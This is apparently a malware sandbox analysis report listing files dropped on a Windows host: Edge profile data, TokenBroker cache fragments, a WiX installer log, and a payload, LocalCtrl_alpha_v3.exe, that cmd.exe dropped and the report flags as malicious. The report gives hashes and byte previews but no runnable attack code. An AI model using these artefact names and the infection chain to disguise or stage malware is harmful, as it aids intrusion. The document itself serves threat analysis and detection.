                                                                                                                                                                  Size (bytes):8110
                                                                                                                                                                  Entropy (8bit):5.800596893389728
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:asNAtBCteiRUVfQTkCG6qRAq1k8SPxVLZ7VTiq:asNAKdw4QCG6q3QxVNZTiq
                                                                                                                                                                  MD5:4014F4FCF6D9408D2C5919DC1DE23A0A
                                                                                                                                                                  SHA1:2A8EB58DFF151022C49057265AFBAF504D27B1DA
                                                                                                                                                                  SHA-256:2292410242834994B23BA03EB5C7BC50E3652C9AE034EE8655D6A54F40BEE108
                                                                                                                                                                  SHA-512:2895154F175E85FB1DEFDE498906B8AC683201EB224E4AB299593CD3E3C2BB93EDDF3526AE0022E0E0A740C8F77798546F218D2B39CD1DCFB8B2C1A593E9E719
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fea4c6e1-8650-4357-b8c4-ea765e67b93e.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8351
                                                                                                                                                                  Entropy (8bit):5.486905765645497
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uVgXqsNk5hsGKf1BCg5ih/cIyURLl8Roto24j2lDBE2Vvl62Zj/Me4WJkCcIrbtw:uxsNwhEBCdViRUvEx2j/lkCLMT2WQ/m
                                                                                                                                                                  MD5:2A1894D29028B8B9C73D0CE0AFF69F9F
                                                                                                                                                                  SHA1:99C63D219A6446B887C239DD066B1142494899F4
                                                                                                                                                                  SHA-256:2D454D7D19D4AFAE94E80C6754E77061231817F19EBC2760CB4C0F7AB4724B22
                                                                                                                                                                  SHA-512:895D900FE7BF089AE4866B35018D48D13104A3BC556B63696B5A4EE10776800FA36DB179944E8E07935F0E847259539D3AAAEAAFBF2E9132FF62415F8CC48F9C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380675475054861","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sid

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                  Entropy (8bit):3.8429304279392076
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxjxl9Il8uJhXa/IGpbWcLgIofqd1rc:miY5X0bF0Iop
                                                                                                                                                                  MD5:1B1498938D5CAFBE0D6495DCB4449A64
                                                                                                                                                                  SHA1:23CC2D968FD8587707BF876C6523CCC4D0103AB7
                                                                                                                                                                  SHA-256:524E3DC87B9D4A131B0AB5FD2439E676D4848C7873B7F44909CA69A71FD92332
                                                                                                                                                                  SHA-512:1A2EEABB1A2FCC13610718775AA1D483D4F06C7923BD9F472EEE12C57C65AAE645FBA86E3E7A2F889A18160B9A37AB570DA88EFBDEA353337F094899F6AD3EC0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.B.f.6.O.J.F.g.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.S.U.X.h.7.S.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                  Entropy (8bit):4.000632576035383
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:bYla01B00R1UoX7WYprxGGPlzQhAaFeiww1:b4l1B00Yyjoh2aFeiw4
                                                                                                                                                                  MD5:233F34DA962B8B3A2C66A353DC79E2B5
                                                                                                                                                                  SHA1:4CFC785A9A51A3158CA37C6CD2A5D482C521313A
                                                                                                                                                                  SHA-256:23F45BD445E791D789CC92384A7A0155EB1028E109B264B897A1A3F43F3CBE4F
                                                                                                                                                                  SHA-512:F5B99C1CE6B9114FADE2BDDA002E65FB11E29C5A96847D127A2E7CEE4D300CDB2D496788A9F0C621993E6951965C04ED76F9DC475A4A38CD906BAC6BA3FD30C5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".5.B.i.3.H.o.l.g.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.S.U.X.h.7.S.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                  Entropy (8bit):3.9107320766454494
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xGxl9Il8u5z4rlUKvEhX8R6cXMHoyoD/Igbkz4PBd/vc:asYfOltv4XcXMH3kAgbA44
                                                                                                                                                                  MD5:C81184F9D428A6E9CA5340EA3C34EE84
                                                                                                                                                                  SHA1:01ED8653DC78908B645B631DCE2146EDBB695E0A
                                                                                                                                                                  SHA-256:FD76ED97D54BDB0AC11023B2D7BE440EAB0B0816833AC9E74CA000A3FA60ED27
                                                                                                                                                                  SHA-512:3FEF56A1B584A02F8B3C53CE0FC10AF8A6BC10FB40B65487EE2C2BA0F87677B9465986556DBA8BE78691C5367839F2E20F17C60B7F7EB23531C19F0AA9E9AF51
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".4.n.T.O.T.1.p./.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.S.U.X.h.7.S.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\14d638ef-0e4c-40d6-81eb-094ed8eb986a.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\14fdc29d

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5698949
                                                                                                                                                                  Entropy (8bit):7.732605304689901
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:KZYCs8JG/DzFEt9TGa7dm+vj23KunPJbyDoxTI8mTaNBQtycgnt9b9:hz+G/D5ATGa7UcyVxUDAPv9b9
                                                                                                                                                                  MD5:0D46ACA484009FCE8AF1DF2994AF7D80
                                                                                                                                                                  SHA1:E8F02F5EF00F1457E18FA542D519EF2CE4EC08DE
                                                                                                                                                                  SHA-256:6527F5C3C45EE6FB350828C84D1614A3D78CCB4D4CB33C47F18A068BE44870B0
                                                                                                                                                                  SHA-512:1FB0C92B6F1BF04428201C8C55E96342623EF1896642C2B567E324B815AE467C6477BFBD5EA0036DE5A2B0B99CF9773AE5F706794741775F97B3038563E2AC56
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...J..Q.U.Q.D.L.l.b$v.v?Y.y%a.g8Y.d*w.0.`.e.U..,w.}8Y.d*w.e;...K...K...K...K...K...K...K...K...K...K...K....k.d"d.y1`.hK...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K....w.q?`.~8q.~(`..K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K..G.K.Y. .]"f..8j.deK.D.C.q&`..9n..K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K.."e5.%{2.'K...K...K...K...K...K...K...K...K...K...K.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\5126519

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5698949
                                                                                                                                                                  Entropy (8bit):7.732605053098858
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:dZYCs8JG/DzFEt9TGa7dm+vj23KunPJbyDoxTI8mTaNBQtycgnt9b9:Uz+G/D5ATGa7UcyVxUDAPv9b9
                                                                                                                                                                  MD5:DAACC5B4FDC93ED803C4150300BB6696
                                                                                                                                                                  SHA1:97727BF0EE8D60ED4AF8BE28762F3498DF3157A7
                                                                                                                                                                  SHA-256:1E2BC17A3D25A52006231731A303BE20D15A092FAF013969ABBF8B36957F668E
                                                                                                                                                                  SHA-512:0EB07077C61D35FBD94E73902B7EEE33F756BB1F11507B5F37734E26F391816C95A42E262C06C452BCDB51267698931FE434DE7BC710F9499F8440B084E2F900
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...J..Q.U.Q.D.L.l.b$v.v?Y.y%a.g8Y.d*w.0.`.e.U..,w.}8Y.d*w.e;...K...K...K...K...K...K...K...K...K...K...K....k.d"d.y1`.hK...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K....w.q?`.~8q.~(`..K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K..G.K.Y. .]"f..8j.deK.D.C.q&`..9n..K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K...K.."e5.%{2.'K...K...K...K...K...K...K...K...K...K...K.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\57db6b84-0f49-4398-8a1b-a630f2ce00f7.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):206855
                                                                                                                                                                  Entropy (8bit):7.983996634657522
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                  MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                  SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                  SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                  SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\99b5ec1b-bde7-481d-892b-a86ab8a6bdc2.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JPEG image data, comment: "Lavc59.36.100", baseline, precision 8, 1280x720, components 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1642130
                                                                                                                                                                  Entropy (8bit):7.993199873349357
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:24576:CWsTHqd4xsbp1EuqYhz38cWN/Y2ucp5gMDQNFnwZXKLl4CSkGpyu0GAZYUWX6JNN:CnKd4sbp1/lAcOMIQtAMl4CShmYG3N
                                                                                                                                                                  MD5:E6A31B826ACE4BE80044EC2A52497884
                                                                                                                                                                  SHA1:2600B612B4DC2CC8564F80CF0157E568A8A62F99
                                                                                                                                                                  SHA-256:1698C9E8BE6D9A3B20E0E505E22F0CD30BC8B8C337F899DDBD47478C251CBA66
                                                                                                                                                                  SHA-512:FA4942C7DDE508329E2AE96A6710DDCBF0B8352E002D863FB06BBB426D968700FBBA5113843CA19CB1C9CE7DEB710B1F0AE333240FCFE70E3315BC35772D0D79
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Hebephrenia_20250106171635.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                  Entropy (8bit):5.4134494108513085
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:+DRbybAIeLLznQugDRbZH8DRbScP2w3DRbScP2MSDRMgcP2Uf63rWDRgcP2skDRw:UV0xYnQuOVUVdHVdoS3h63rsRlqROv
                                                                                                                                                                  MD5:6453F9C690DC633C123402C081BF1302
                                                                                                                                                                  SHA1:5DD1F65DBAC20BB7FD7C02C96C12C1E54ADEC46F
                                                                                                                                                                  SHA-256:C835E4217B3F99CB13998BFE8DF7C3027642FC434A81E00DB1D0B56C293E302C
                                                                                                                                                                  SHA-512:747C273A5B446309A0D4570404A07F40A78FD54CA18E87CD0730C2DDA85DF094018DD36683B315349FAB9A057E7D712ECDBA9CB87E2852A56B501D45068FAEA9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[1CC0:1CC4][2025-01-06T17:16:34]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe..[1CC0:1CC4][2025-01-06T17:16:34]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\w3245.exe -burn.filehandle.attached=688 -burn.filehandle.self=692'..[1CC0:1CC4][2025-01-06T17:16:34]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\w3245.exe'..[1CC0:1CC4][2025-01-06T17:16:34]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1CC0:1CC4][2025-01-06T17:16:35]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Hebephrenia_20250106171635.log'..[1CC0:1CC4][2025-01-06T17:16:36]i000: Setting string variable 'WixBundleName' to value 'Hebephrenia'..[1CC0:1CC4][2025-01-06T17:16:36]i000: Setting string variable 'WixBundleManufacturer' to value 'Windlestraw'..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2364728
                                                                                                                                                                  Entropy (8bit):6.606009669324617
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                                                                                  MD5:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                  SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                                                                                  SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                                                                                  SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: 9mauyKC3JW.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: ATLEQQXO.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: ATLEQQXO.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: upgrade.hta, Detection: malicious, Browse
                                                                                                                                                                  • Filename: MiJZ3z4t5K.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: UolJwovI8c.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: ONHQNHFT.msi, Detection: malicious, Browse
                                                                                                                                                                  • Filename: es.hta, Detection: malicious, Browse
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\a2711558-0ca2-414c-a423-c4c712bdad20.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:L:L
